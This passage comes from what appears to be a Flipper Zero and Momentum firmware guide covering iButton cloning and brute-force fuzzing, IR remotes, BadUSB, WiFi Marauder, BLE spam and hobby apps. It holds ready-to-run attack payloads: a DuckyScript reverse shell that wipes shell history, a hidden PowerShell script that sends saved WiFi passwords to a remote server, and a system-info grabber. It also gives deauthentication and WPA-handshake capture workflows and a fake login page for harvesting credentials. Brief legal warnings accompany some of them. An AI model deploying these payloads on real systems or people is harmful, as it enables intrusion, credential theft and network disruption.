Different electrical signaling makes it trickier to duplicate
Common in older Russian and CIS-country intercoms

Metakom

Another Russian protocol, similar to Cyfral but with parity checking
4 bytes (32 bits) — more IDs than Cyfral, fewer than Dallas
Also resistance-based signaling
Found alongside Cyfral in Russian apartment buildings

Flipper Does All Three

When you read an iButton, Flipper auto-detects the protocol. You don't need to know which type it is beforehand — just press the key and Flipper figures it out.

📖 Reading & Emulating

📖 Read — Capturing a Key

Beginner

▼

Reading an iButton is instant — just press the key against the Flipper's iButton pad.

Navigate to iButton → Read on your Flipper

Press the key against the iButton pad (bottom-left of device)

Flipper auto-detects the protocol (Dallas, Cyfral, or Metakom)

Screen shows: protocol type + ID in hex

Choose to Save to SD card or Emulate immediately

Pin Layout

The iButton pad has two sets of pins. Reading uses the RIGHT two pins. This is different from emulation — keep this in mind if things aren't working.

📤 Emulate — Acting as a Key

Beginner

▼

Once you've saved a key, you can turn your Flipper into that key.

Go to iButton → Saved → select your key

Tap Emulate

Press the Flipper's iButton pad against the door reader

If the ID matches — the door opens

Tips for Stubborn Readers

Emulation uses the LEFT two pins on the iButton pad (different from read!)
~80% of readers work on the first try
For recessed or awkward readers, use GPIO pins with wires to extend the contacts
The Flipper only emulates one key at a time — no auto-cycling
Try different angles and pressures — some readers need firm, centered contact

Left vs Right

This catches everyone at first: Read = right pins, Emulate = left pins. If you're pressing against a reader and nothing happens, you might be using the wrong side of the pad.

✏️ Add Manually — Enter an ID by Hand

Intermediate

▼

Don't have the physical key? You can enter the ID manually.

Go to iButton → Add Manually

Select protocol: Dallas, Cyfral, or Metakom

Type the hex bytes of the ID

Save — now you can emulate or write it

Watch the Byte Order

The ID engraved on physical keys is sometimes in reverse order or missing some bytes. If a manually entered ID doesn't work, try reversing the byte order. Example: if the key shows EF CD 9B 78 56 A4, the actual serial might be A4 56 78 9B CD EF.

📝 Cloning & Writing to Blank Keys

💾 Writing to Blank Keys — Physical Cloning

Intermediate🐬🐬🐬

▼

Unlike emulation (which uses your Flipper as the key), writing creates a permanent physical clone on a blank iButton.

Writable Blank Keys

Blank Type	Protocol	Price	Notes
RW1990	Dallas	$0.50–1	Most common writable blank. Re-writable.
TM2004	Dallas	$1–2	Also rewritable, slightly newer.
TM01C	Multi-protocol	$2–3	Supports Dallas, Cyfral, and Metakom.

How to Clone

First, read and save the original key (iButton → Read → Save)

Go to iButton → Saved → select the key → Write

Press the blank against the iButton pad

Flipper writes the ID in ~2 seconds — done!

⚠️ Finalization Warning

Some blank keys can be "finalized" — permanently locked so they can never be rewritten. This is irreversible. Be cautious with unknown blanks, and always test with a known-fresh RW1990 first. Some intercom systems intentionally try to finalize your key on read to prevent clones.

Where to Buy

Search AliExpress or Amazon for "RW1990 iButton writable" or "TM01C iButton blank". A pack of 10 costs $5–10. Make sure they explicitly say "writable" or "rewritable" — standard DS1990A keys are read-only.

🚀 Momentum Firmware Extras

🎲 iButton Fuzzer — Brute-Force Testing

Advanced🐬🐬🐬

▼

The iButton Fuzzer app tries random or sequential IDs against a reader to test if any are valid. This is a brute-force access test.

Select protocol (Dallas, Cyfral, or Metakom)
Choose attack mode: random, sequential, or custom range
Press the Flipper's iButton pad against the reader
Flipper cycles through IDs rapidly
If the door opens — you've found a valid ID

Realism Check

Dallas has 2⁴⁸ possible serial numbers (281 trillion). Brute-forcing Dallas is statistically impractical. Cyfral (2¹⁶ = 65,536 IDs) and Metakom (2³² = 4 billion) are more feasible. This tool is mainly useful for testing Cyfral intercoms or systems with predictable ID patterns.

🔄 iButton Converter

Intermediate

▼

Convert between different iButton file formats. Useful when sharing keys between different Flipper firmware versions or converting community-shared key files.

💻 CLI Commands

Command	Description	Example
`ikey read`	Read an iButton key	`ikey read`
`ikey emulate`	Emulate a specific key	`ikey emulate Dallas 01A456789BCDEF3A`
`ikey write`	Write ID to a blank key	`ikey write Dallas 01A456789BCDEF3A`

🔓 Security Assessment

🔓 How Secure is iButton? (Spoiler: It's Not)

Beginner

▼

iButton Dallas is extremely insecure by modern standards. Here's the breakdown:

The Weaknesses

No encryption — the ID is transmitted in plaintext every time
No challenge-response — unlike NFC MIFARE, there's no authentication handshake
Trivially cloneable — anyone who touches your key for 2 seconds can copy it forever
Static ID — the key sends the same data every time, no rolling codes
No mutual authentication — the key trusts any reader, the reader trusts any key with the right ID

Intercom "Defenses" (Easily Defeated)

Some intercoms try to overwrite/finalize keys on read — this just locks the blank, doesn't prevent future clones from other blanks
Some systems use whitelists (only registered IDs work) — but there's no way to prevent reading the ID off a valid key
The only real security is physical: you need to touch the key to read it

Comparison to NFC

Feature	iButton (Dallas)	NFC (MIFARE Classic)	NFC (DESFire)
Encryption	❌ None	⚠️ Weak (Crypto-1)	✅ AES-128
Authentication	❌ None	⚠️ Broken	✅ Mutual auth
Clone difficulty	Trivial	Minutes	Extremely hard
Rolling codes	❌ No	❌ No	✅ Optional

Bottom Line

If your building uses iButton for access control, it's essentially "security by convenience." Anyone with a Flipper (or a $3 Arduino) and brief physical access to a valid key can clone it permanently. The real question is whether your building's threat model warrants upgrading to NFC or mobile-based access.

🛠️ Cool Projects

💡 iButton Project Ideas

Beginner🐬🐬🐬🐬

▼

Building Access

Consolidate your keys — read all your building's iButton keys onto one Flipper. Front door, back door, garage, elevator — all on one device.
Audit your intercom — use the iButton Fuzzer on your own building's intercom to test if predictable IDs work. Report findings to building management.
Backup your keys — clone your keys onto RW1990 blanks. Keep spares in your wallet, car, bag.

Beyond Access Control

Temperature logging — read DS18B20 temperature sensors through the iButton pad (same 1-Wire protocol)
DIY access system — build your own iButton reader with an Arduino + DS9092 probe. Great for learning 1-Wire.
Key inventory — read and catalog every iButton key in your household. Know exactly what you have.

Legality Note

Cloning your own keys for backup is legal everywhere. Testing systems you own or have permission to test is fine. Cloning someone else's key without consent is unauthorized access — don't do it.

🔴 Infrared

Beginner🐬🐬🐬🐬

Control any IR device — TVs, ACs, projectors, fans, audio systems, and more. Comes with a universal remote database plus the ability to learn any remote signal.

📺 Universal Remotes

Beginner🐬🐬🐬🐬🐬

▼

Pre-built remote databases that work with thousands of devices out of the box. No learning required.

Remote Type	Functions	Supported Brands
📺 TV	Power, Volume, Channel, Mute, Input, Menu	Samsung, LG, Sony, Vizio, TCL, Hisense, Panasonic, Philips, Sharp, Toshiba, and 100+ more
❄️ AC	Power, Temp Up/Down, Mode, Fan Speed, Swing	Daikin, Mitsubishi, LG, Samsung, Carrier, Fujitsu, Gree, Haier, Toshiba, and 200+ more
🔊 Audio	Power, Volume, Mute, Source	Bose, Sony, JBL, Samsung, LG, Yamaha, Denon, and more
📽️ Projector	Power, Input, Volume	Epson, BenQ, ViewSonic, Optoma, and more
🌀 Fan	Power, Speed, Oscillation	Various brands

Tip

The TV universal remote tries codes for multiple brands sequentially. Press "Power" repeatedly while pointing at the TV — it cycles through codes until one works.

📡 Learn New Remote

Beginner

▼

Point any existing IR remote at the Flipper to capture individual button signals.

Go to Infrared → Learn New Remote
Point the remote at Flipper's IR receiver (top of device)
Press a button on the remote — Flipper captures the signal
Name the button (e.g., "Power", "Vol Up") and save
Repeat for each button you want to capture
Result: a custom remote file on your SD card

⚡ Momentum IR Apps

🎛️ Cross Remote

Create macro remotes that combine signals from multiple devices. One button press can power on TV + soundbar + set input + dim lights.

Intermediate🐬🐬🐬🐬

🎮 Xbox Controller

Control Xbox consoles via IR. Power on/off, navigate menus, media playback controls.

Beginner🐬🐬

❄️ Hitachi AC Remote

Dedicated Hitachi air conditioner controller with all modes, fan speeds, and temperature control.

Beginner🐬🐬

❄️ Midea AC Remote

Dedicated Midea air conditioner controller.

Beginner🐬🐬

❄️ Mitsubishi AC Remote

Dedicated Mitsubishi air conditioner controller with Electric, Dehumidify, and Auto modes.

Beginner🐬🐬

📏 LIDAR Emulator

Emulates LIDAR signals. Experimental — for research purposes only.

Expert🐬🐬🐬

📋 Supported Protocols

NEC NECext NEC42 Samsung32 RC6 RC5 RC5X SIRC SIRC15 SIRC20 Kaseikyo RCA Pioneer Raw (any signal)

💻 CLI Commands

Command	Description	Example
`ir tx`	Transmit decoded IR signal	`ir tx NEC 04 08`
`ir rx`	Receive and decode IR signal	`ir rx` or `ir rx raw`
`ir universal list`	List available universal remotes	`ir universal list tv`
`ir universal`	Send universal remote signal	`ir universal tv POWER`

⌨️ BadUSB + Bad Keyboard

Intermediate🐬🐬🐬🐬🐬

Turn the Flipper into a keyboard that types at superhuman speed. Execute scripts, exfiltrate data, or deploy payloads — via USB or wirelessly over Bluetooth.

🔌 BadUSB (USB HID)

Intermediate🐬🐬🐬🐬🐬

▼

Plug the Flipper into a computer's USB port. It registers as a keyboard and types pre-programmed keystrokes at ~200 characters/second.

How It Works

Flipper identifies as a USB HID keyboard (no drivers needed)
Executes DuckyScript files (.txt) from the SD card
Compatible with Hak5 Rubber Ducky scripts
Works on Windows, macOS, Linux, Android (with OTG)

Pre-loaded Scripts

Demo scripts — opens Notepad and types a message
qFlipper installer — downloads and installs the Flipper management tool

Creating Custom Scripts

Create .txt files in /ext/badusb/ on the SD card:

REM Open terminal and execute command
DELAY 500
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 500
STRING echo Hello from Flipper Zero!
ENTER

📡 Bad Keyboard — Wireless BadUSB (Momentum)

Intermediate🐬🐬🐬🐬🐬

▼

Momentum exclusive. Same concept as BadUSB, but over Bluetooth. No USB cable needed.

How It Works

Flipper advertises as a Bluetooth keyboard
Target device pairs (or auto-pairs if enabled)
Flipper executes DuckyScript wirelessly
Works from up to 10 meters away

Why This Is Powerful

No physical access needed — just Bluetooth range
Works on locked phones (some Android versions accept BT keyboard input on lock screen for certain functions)
Leave-behind attack — pair, walk away, execute later
Uses the same DuckyScript files as USB BadUSB

Warning

The target device must accept the Bluetooth pairing. Most phones require user confirmation. Some older Android versions and IoT devices auto-pair with BT keyboards.

📝 Example Scripts

🐚 Reverse Shell (Linux/macOS)

Advanced

▼

REM Reverse shell — change IP:PORT to your listener
DELAY 500
CTRL ALT t
DELAY 800
STRING bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
ENTER
DELAY 200
REM Clear terminal history
STRING history -c && exit
ENTER

Legal Warning

Deploying reverse shells on systems you don't own is illegal. Use only in authorized penetration tests.

📶 WiFi Password Exfiltrator (Windows)

Intermediate

▼

REM Extract saved WiFi passwords (Windows)
DELAY 500
GUI r
DELAY 300
STRING powershell -w hidden -c "(netsh wlan show profiles) | Select-String 'All User' | ForEach-Object {$_ -replace '.*:\s+',''} | ForEach-Object {netsh wlan show profile name=$_ key=clear} | Out-File $env:TEMP\wifi.txt; Invoke-WebRequest -Uri 'https://your-server.com/collect' -Method POST -Body (Get-Content $env:TEMP\wifi.txt -Raw)"
ENTER

🎵 Browser Rickroll

Beginner

▼

REM Classic rickroll — opens in default browser
DELAY 500
GUI r
DELAY 300
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER

ℹ️ System Info Grabber (Windows)

Intermediate

▼

REM Gather system info and save to USB drive
DELAY 500
GUI r
DELAY 300
STRING powershell -w hidden -c "$i = systeminfo; $n = ipconfig /all; $w = netsh wlan show profiles; $u = whoami /all; ($i + $n + $w + $u) | Out-File $env:TEMP\sysinfo.txt"
ENTER

📖 DuckyScript Reference

📖 Complete DuckyScript Command Reference ▼

Command	Description	Example
`STRING`	Type a string of characters	`STRING Hello World`
`STRINGLN`	Type string + Enter	`STRINGLN dir /b`
`DELAY`	Wait N milliseconds	`DELAY 500`
`ENTER`	Press Enter key	`ENTER`
`GUI` / `WINDOWS`	Windows/Super key	`GUI r` (Win+R)
`ALT`	Alt key (+ combo)	`ALT F4`
`CTRL`	Control key (+ combo)	`CTRL c`
`SHIFT`	Shift key (+ combo)	`SHIFT TAB`
`TAB`	Tab key	`TAB`
`ESC` / `ESCAPE`	Escape key	`ESC`
`UP/DOWN/LEFT/RIGHT`	Arrow keys	`DOWN DOWN ENTER`
`CAPSLOCK`	Caps Lock	`CAPSLOCK`
`DELETE`	Delete key	`DELETE`
`BACKSPACE`	Backspace key	`BACKSPACE`
`HOME` / `END`	Home/End keys	`HOME`
`INSERT`	Insert key	`INSERT`
`PAGEUP` / `PAGEDOWN`	Page Up/Down	`PAGEUP`
`PRINTSCREEN`	Print Screen	`PRINTSCREEN`
`MENU` / `APP`	Context menu key	`MENU`
`F1`–`F12`	Function keys	`F5`
`REM`	Comment (not executed)	`REM This is a comment`
`REPEAT`	Repeat previous line N times	`REPEAT 5`
`DEFAULTDELAY`	Set default delay between lines	`DEFAULTDELAY 100`
`SYSRQ`	System Request key (Linux)	`SYSRQ`

DuckyScript 3.0 Advanced (Momentum Support)

REM Variables and conditionals
VAR $COUNT = 0
WHILE ($COUNT < 5)
    STRING Iteration:
    STRING $COUNT
    ENTER
    $COUNT = ($COUNT + 1)
    DELAY 200
END_WHILE

📶 WiFi Dev Board + Marauder

Advanced🐬🐬🐬🐬🐬

The WiFi Dev Board (ESP32-S2) turns your Flipper into a WiFi hacking platform. ESP32 Marauder is the most popular firmware — providing WiFi scanning, deauth attacks, beacon spam, packet capture, evil portals, and more.

🔧 Setup & Installation

Intermediate

▼

Hardware

Official WiFi Dev Board — ESP32-S2 based, plugs directly into Flipper GPIO
Third-party ESP32 boards — ESP32-WROOM, ESP32-S3, etc. (need wiring)
Connected via UART over GPIO (pins 13/14 for TX/RX)

Flash Marauder

Go to ESP32Marauder Wiki and download the latest firmware for your board.

Use esptool.py or the web flasher at espressif.github.io/esptool-js to flash.

Connect the board to Flipper's GPIO header. Power from Flipper's 3.3V or 5V pin.

On Flipper: GPIO → ESP32 → Marauder (or ESP → WiFi Marauder in Momentum).

Tip

Momentum comes with the WiFi Marauder companion app pre-installed. No need to install it separately.

📡 Marauder Scan Commands

🔍 Scan Commands ▼

Command	Description	Notes
`scanap`	Scan for WiFi access points	Lists all visible APs with SSID, BSSID, channel, RSSI
`scansta`	Scan for WiFi stations (clients)	Shows connected devices and their associated APs
`sniffbeacon`	Sniff beacon frames	Passive — captures AP advertisements
`sniffdeauth`	Sniff deauth frames	Detect deauth attacks in progress
`sniffpmkid`	Sniff PMKID frames	Capture PMKID for offline cracking (WPA2)
`sniffpwnagotchi`	Detect nearby Pwnagotchis	Identifies Pwnagotchi devices via beacon frames
`sniffprobe`	Sniff probe requests	See what networks nearby devices are looking for
`sniffraw`	Raw 802.11 packet capture	Saves to PCAP for Wireshark analysis
`sniffesp`	Sniff ESP-NOW protocol	Captures ESP-NOW packets between ESP32 devices
`stopscan`	Stop any running scan/attack	Always run this before starting a new scan

⚔️ Marauder Attack Commands

💥 Attack Commands ▼

Command	Description	Target
`attack -t deauth`	Deauthentication attack — kicks clients off WiFi	Selected AP or all
`attack -t beacon -l`	Beacon spam from list — floods area with fake SSIDs	From saved list
`attack -t beacon -r`	Beacon spam with random SSIDs	Random names
`attack -t beacon -rr`	Rickroll beacon spam — floods with Rick Astley lyrics	Rickroll SSIDs
`attack -t probe`	Probe request flood	Selected APs
`attack -t deauth -c`	Targeted deauth on specific channel	Specific channel

Typical Attack Workflow

# 1. Scan for access points
scanap
# 2. Wait 5-10 seconds, then stop
stopscan
# 3. List discovered APs
list -a
# 4. Select target AP (by number from list)
select -a 3
# 5. Deauth the target
attack -t deauth
# 6. Stop when done
stopscan

Legal Warning

Deauth attacks and WiFi jamming are illegal in most jurisdictions without authorization. Only use on networks you own or have explicit written permission to test.

📦 Marauder Selection & List Commands

📋 Selection & Management Commands ▼

Command	Description
`list -a`	List scanned access points
`list -s`	List scanned stations (clients)
`list -c`	List scanned SSIDs for clone portal
`select -a <n>`	Select an AP by index number
`select -s <n>`	Select a station by index number
`select -a all`	Select all APs
`clearlist -a`	Clear AP list
`clearlist -s`	Clear station list
`channel <n>`	Set WiFi channel (1-14)
`channel -h`	Enable channel hopping
`update`	Check for firmware updates
`reboot`	Reboot the ESP32

🎭 Evil Portal

🎭 Evil Portal — Captive Portal Attacks

Advanced🐬🐬🐬🐬🐬

▼

Creates a fake WiFi captive portal (like hotel/airport WiFi login pages) to harvest credentials.

How It Works

ESP32 creates an open WiFi network with an enticing name (e.g., "Free Airport WiFi")

Victim connects — automatically redirected to your fake login page

Victim enters credentials (email, password, etc.) thinking it's a real portal

Credentials are logged to the SD card and displayed on Flipper's screen

Setup

Upload HTML templates to SD card: /ext/portal/
Templates available: Google login, Facebook, WiFi portal, Microsoft, custom
Marauder command: evil portal or configure via the companion app

Creating Custom Portal Pages

<!-- Save as /ext/portal/custom.html -->
<html>
<head><title>WiFi Login</title></head>
<body style="font-family:sans-serif;text-align:center;padding:40px">
  <h2>Welcome to Free WiFi</h2>
  <p>Please sign in to continue:</p>
  <form action="/login" method="POST">
    <input name="email" placeholder="Email" style="padding:10px;width:250px"><br><br>
    <input name="password" type="password" placeholder="Password" style="padding:10px;width:250px"><br><br>
    <button type="submit" style="padding:10px 30px">Connect</button>
  </form>
</body>
</html>

Legal Warning

Credential harvesting is illegal without explicit authorization. Evil portals are for authorized security assessments only.

📦 Marauder Sniffer Commands

📡 Packet Capture & Analysis ▼

Command	Captures	Output
`sniffraw`	All 802.11 frames	PCAP file on SD card
`sniffpmkid`	PMKID from WPA2 APs	For hashcat cracking
`sniffbeacon`	Beacon frames only	AP enumeration
`sniffprobe`	Probe requests	Client network history
`sniffdeauth`	Deauth frames	Detect attacks

Capture WPA Handshakes

# Start raw capture + deauth to force reconnection
scanap
stopscan
select -a 3
sniffraw
# In another session or after capture:
attack -t deauth
# Wait for client to reconnect (handshake captured)
stopscan
# Transfer PCAP from SD card → crack with hashcat/aircrack-ng

👻 Ghost ESP

👻 Ghost ESP — Alternative WiFi Suite

Advanced🐬🐬🐬🐬

▼

Ghost ESP is a Momentum-included alternative to Marauder. Built for ESP32, it provides a similar feature set with some differences:

WiFi scanning — AP and station discovery
Deauth attacks — kick clients off networks
Beacon spam — flood with fake SSIDs
Captive portal — evil portal functionality
Packet capture — PCAP output
BLE attacks — BLE spam and scanning (if using ESP32 with BLE support)
Active development — newer codebase, some unique features

Available under Momentum's GPIO → Ghost ESP app.

📡 Bluetooth

Intermediate🐬🐬🐬🐬🐬

Flipper Zero's built-in BLE 5.0 radio enables BLE spam attacks, FindMy tracking, Bluetooth HID devices, and more. Momentum unlocks the full potential.

📱 BLE Spam (Momentum Exclusive)

📱 BLE Spam — Fake Device Popups

Beginner🐬🐬🐬🐬🐬

▼

Generates BLE advertisements that trigger pop-up notifications on nearby phones and computers.

Target	Effect	Range	Notes
🍎 Apple	Fake AirPods/AirTag/Apple TV pairing popups	~10m	Works on iOS 17+. Shows "AirPods Pro found nearby" etc.
📱 Samsung	Fake Galaxy Buds pairing notifications	~10m	Shows "Galaxy Buds Pro found nearby" on Samsung phones
🔵 Google	Fake Pixel Buds / Fast Pair popups	~10m	Triggers Google Fast Pair on Android devices
🪟 Windows SwiftPair	Bluetooth pairing notification flood	~10m	Spams Windows PCs with pairing requests
🍏 Sour Apple	iOS device crash (older iOS only)	~10m	Exploited a bug in iOS < 17.2 — causes settings crashes. Patched.

Usage

Navigate to Bluetooth → BLE Spam (Momentum menu)
Select target platform
Choose device type to spoof (e.g., AirPods Pro, Galaxy Buds, etc.)
Start — Flipper begins broadcasting fake BLE advertisements
Nearby devices within ~10m see pairing popups

Note

BLE Spam is mostly annoying but harmless. Victims can dismiss notifications. The Sour Apple crash attack has been patched in iOS 17.2+. This is a demonstration of BLE protocol weaknesses.

📍 FindMy Flipper

📍 FindMy Flipper — Track via Apple's Network

Beginner🐬🐬🐬🐬🐬

▼

Makes your Flipper Zero trackable through Apple's FindMy network — just like an AirTag. Uses the massive network of iPhones worldwide to relay your Flipper's location.

How It Works

Auto-enabled on Momentum firmware — starts broadcasting at boot
Flipper broadcasts BLE advertisements mimicking an AirTag
Nearby iPhones pick up the signal and anonymously relay location to Apple
You see your Flipper's location in the FindMy app on your iPhone/Mac
Works even when Flipper is powered off (if battery has charge for BLE)

Setup

On first Momentum boot, FindMy is configured automatically
Open FindMy app on iPhone → Items → your Flipper appears as an AirTag-like device
Configure in Momentum App → BLE → FindMy

Tip

This is incredibly useful if you lose your Flipper. As long as any iPhone passes within BLE range (~30m), the location updates. Works in cities, malls, airports — anywhere people have iPhones.

⌨️ Bluetooth HID

⌨️ BT HID — Bluetooth Keyboard & Mouse

Beginner🐬🐬🐬

▼

Use your Flipper as a Bluetooth keyboard, mouse, or media controller for any device.

Bluetooth Remote — control media playback, presentations, volume
Bad Keyboard — wireless BadUSB (DuckyScript over BLE)
USB Keyboard/Mouse — when connected via USB, Flipper acts as a HID device

Pair with your phone, tablet, or computer like any Bluetooth keyboard. Useful for presentations, remote control, or as an accessibility tool.

🔌 GPIO & Expansion Modules

Advanced🐬🐬🐬🐬

18 GPIO pins at 3.3V for connecting WiFi boards, sensors, displays, and custom hardware. Built-in UART, SPI, I2C, and 1-Wire support.

🔌 Built-in GPIO Features

Intermediate

▼

Feature	Description	Use Case
GPIO Control	Set pins as input/output, read voltage levels	LED control, button reading, sensor interfacing
USB-UART Bridge	Flipper acts as USB-to-serial adapter	Connect to serial consoles, debug embedded devices, ESP32 programming
1-Wire	Dallas 1-Wire protocol interface	iButton emulation, temperature sensors (DS18B20)
I2C Scanner	Scan I2C bus for connected devices	Identify connected I2C sensors, displays, etc.

GPIO Pin Layout

    ┌──────────────────────────────────┐
    │  Flipper Zero GPIO Header (top)  │
    ├──────────────────────────────────┤
    │  1  [3.3V]    [GND]  2          │
    │  3  [SWC]     [A7]   4          │
    │  5  [SWD]     [A6]   6          │
    │  7  [5V]      [A4]   8          │
    │  9  [C3]      [B3]   10         │
    │  11 [C1]      [B2]   12         │
    │  13 [C0/TX]   [C5]   14         │
    │  15 [RX/C1]   [C4]   16         │
    │  17 [iButton] [GND]  18         │
    └──────────────────────────────────┘
TX/RX (pins 13-14): UART for WiFi Dev Board / Marauder
5V (pin 7): Power ESP32 boards directly
3.3V (pin 1): Logic level for most sensors

⚡ Momentum GPIO Apps

🔍 GPIO Explorer

Visual pin state viewer. See real-time status of all GPIO pins — high/low, input/output mode, voltage levels.

Beginner🐬🐬

📻 KT0803 FM Transmitter

Transmit FM radio using a KT0803L module connected via I2C. Set frequency, volume, and broadcast audio over FM.

Intermediate🐬🐬🐬🐬

🔄 SPI Terminal

Send and receive data over SPI bus. Useful for debugging SPI devices, flash chips, and embedded systems.

Advanced🐬🐬

🔌 FlipTDI

FTDI232H interface emulation. USB-to-serial with advanced features like MPSSE for SPI/I2C/JTAG.

Advanced🐬🐬

⚡ INA Meter

Read voltage, current, and power from INA2xx series power measurement ICs. Great for profiling power consumption.

Intermediate🐬🐬🐬

👻 Ghost ESP

Alternative WiFi/BLE attack suite for ESP32 boards. Scans, deauth, beacon spam, evil portal, packet capture.

Advanced🐬🐬🐬🐬

🌿 CO2 Logger

Read CO2 levels from an MH-Z19 sensor connected via UART. Displays ppm readings with graph history.

Intermediate🐬🐬🐬

🎮 FlipBoard Suite

Four apps for the FlipBoard accessory: Blinky (LED patterns), Keyboard (custom shortcuts), Signal (GPIO signaling), Simon (memory game).

Beginner🐬🐬🐬

🌐 FlipperHTTP Apps

HTTP-enabled apps via ESP32: FlipMap (maps), FlipTelegram (Telegram client), Free Roam (web browser). Requires WiFi-connected ESP32.

Intermediate🐬🐬🐬

📍 GPS Nearby Files

Find saved files (Sub-GHz captures, NFC dumps, etc.) that were captured near your current GPS coordinates. Requires GPS module.

Intermediate🐬🐬🐬

🗺️ Wardriver

WiFi wardriving with GPS logging. Scans nearby WiFi networks while recording GPS coordinates. Export to Wigle-compatible CSV for mapping.

Advanced🐬🐬🐬🐬

🎮 Games, Tools & Media

Beginner🐬🐬🐬

Beyond hacking — Flipper Zero runs games, media players, and essential tools. Momentum includes a huge app library.

🎮 Games

👹 Doom

Yes, Doom runs on Flipper Zero. Single-player FPS on a 128×64 screen. D-pad controls, surprisingly playable.

Beginner🐬🐬🐬🐬🐬

🔢 2048

Classic tile-sliding puzzle game. Combine numbers to reach 2048.

Beginner🐬🐬🐬

🐍 Snake

The classic Nokia snake game. Grow the snake, don't hit the walls.

Beginner🐬🐬🐬

🧱 Tetris

Classic block-stacking puzzle. Fits perfectly on the 128×64 screen.

Beginner🐬🐬🐬

🏓 Arkanoid

Break bricks with a bouncing ball. Classic arcade action.

Beginner🐬🐬🐬

🐦 Flappy Bird

Navigate the bird through pipes. Addictive and frustrating as ever.

Beginner🐬🐬🐬

💣 Minesweeper

Classic minesweeper. Flag mines, clear the board.

Beginner🐬🐬

🎨 Color Guess

Guess the RGB color value. Tests your color perception skills.

Beginner🐬🐬

🔧 Tools

⚙️ Momentum App

Central firmware configuration. Manage protocols, extended frequencies, UI themes, RGB backlight, asset packs, passport customization, and all Momentum settings.

Beginner🐬🐬🐬🐬🐬

📊 Frequency Analyzer

Real-time RF frequency detection. Point and press — see what frequency a device transmits on.

Beginner🐬🐬🐬🐬

🎮 Bluetooth Remote

Use Flipper as a Bluetooth remote for presentations, media playback, or cursor control.

Beginner🐬🐬🐬

⌨️ USB Keyboard/Mouse

Flipper as a wired USB keyboard or mouse. Use the d-pad to control cursor or type text.

Beginner🐬🐬

🔑 iButton Fuzzer

Brute-force iButton (1-Wire) intercom keys. Tries random or sequential codes against Dallas, Cyfral, and Metakom locks.

Advanced🐬🐬🐬

🎬 Media

📹 Video Player

Play converted video files on Flipper's 128×64 screen. Supports custom-encoded .bm format.

Beginner🐬🐬🐬

🖼️ Image Viewer

Display images on Flipper's screen. Supports 128×64 BM/BMP monochrome images.

Beginner🐬🐬

🔊 WAV Player

Play WAV audio files through Flipper's speaker. 8-bit, mono, 8-48kHz sample rate. Tiny but functional.

Beginner🐬🐬🐬

🌌 Space Playground

Interactive space-themed screensaver and animation playground.

Beginner🐬🐬

🎨 Customization

🪪 Passport & Identity

Beginner🐬🐬🐬🐬

▼

Customize your Flipper's identity via the Passport feature:

Name — custom device name shown on the passport screen
Level — increases with usage (read cards, send signals, etc.)
Custom backgrounds — Momentum supports custom passport backgrounds
Multiple themes — choose from pre-installed passport themes or create your own

🐬 Desktop Animations & Asset Packs

Beginner🐬🐬🐬🐬

▼

Momentum supports 100+ community animation packs that change the idle dolphin animation on the home screen.

Download packs from the Momentum community
Place in /ext/dolphin/ on SD card
Select via Momentum App → Desktop → Animations
Themes include: cyberpunk, pixel art, anime, memes, custom characters

🌈 RGB Backlight (Momentum)

Beginner🐬🐬🐬🐬

▼

Momentum enables full RGB control of the screen backlight (stock firmware only supports orange).

Momentum App → LED → Backlight
Set any RGB color combination
Rainbow mode — cycles through colors
Different colors for different events (read success = green, error = red)

Note

RGB backlight requires a hardware modification on some Flipper revisions (replacing the stock LED with an RGB LED). Newer revisions and some sellers include the RGB LED pre-installed.

🛡️ Cool Things You Can Do

Beginner🐬🐬🐬🐬🐬

A showcase of the most interesting projects and demonstrations. These are the "wow factor" moments that make Flipper Zero special.

🏢

Clone Your Building Access Card

Read your MIFARE Classic or HID ProxCard badge, crack the keys with MFKey, and write a perfect clone to a magic card. Never worry about forgetting your badge again.

🐬🐬🐬🐬🐬 Intermediate

📺

Turn Off Any TV in a Restaurant

Use the universal TV remote to power off (or on) any TV within IR range. The power button cycles through hundreds of brand codes until it hits the right one.

🐬🐬🐬🐬🐬 Beginner

🏠

Open Your Garage From Your Phone

Capture your garage door signal, save it to the Flipper, then trigger it remotely via the FlipperLab dashboard. Open your garage from anywhere with internet access.

🐬🐬🐬🐬 Beginner

📡

Map the Radio Spectrum

Use Sub Analyzer and Frequency Analyzer to sweep the radio spectrum. Identify every wireless device in your environment — weather stations, baby monitors, wireless sensors, IoT devices.

🐬🐬🐬🐬 Intermediate

📶

Test Your Home WiFi Security

With the WiFi Dev Board, scan for vulnerabilities: weak passwords (PMKID capture + hashcat), WPS PIN attacks, rogue AP detection, and client isolation testing.

🐬🐬🐬🐬🐬 Advanced

🎭

Create an Evil Twin Network

Set up a fake WiFi portal that mimics a real network. When users connect, they see a login page you control. Demonstrates the danger of public WiFi. For authorized testing only.

🐬🐬🐬🐬🐬 Advanced

📱

Spam BLE Popups at Friends

Trigger fake AirPods/Galaxy Buds pairing popups on nearby phones. Harmless fun — the notifications dismiss easily. Works from 10 meters away.

🐬🐬🐬🐬🐬 Beginner

🚇

Read Transit Card Balance

Use Metroflip to read your transit card and see your balance, recent trips, and card details. Supports 80+ transit systems worldwide.

🐬🐬🐬🐬 Beginner

🎵

Rickroll via Beacon Spam

Use Marauder's beacon spam with the rickroll SSID list. Everyone nearby sees WiFi networks named with lyrics to "Never Gonna Give You Up" 🎶

🐬🐬🐬🐬🐬 Beginner

🤖

Make NFC Body Implants Glow

Use the Cyborg Detector app to generate a continuous NFC field. NFC implants with LEDs (like the xSIID) will glow when held near the Flipper. Cyberpunk vibes.

🐬🐬🐬🐬🐬 Beginner

🗺️

War-Drive Your Neighborhood

Attach a GPS module + WiFi Dev Board and walk/drive around. The Wardriver app logs every WiFi network with its GPS coordinates. Export to Wigle for mapping.

🐬🐬🐬🐬 Intermediate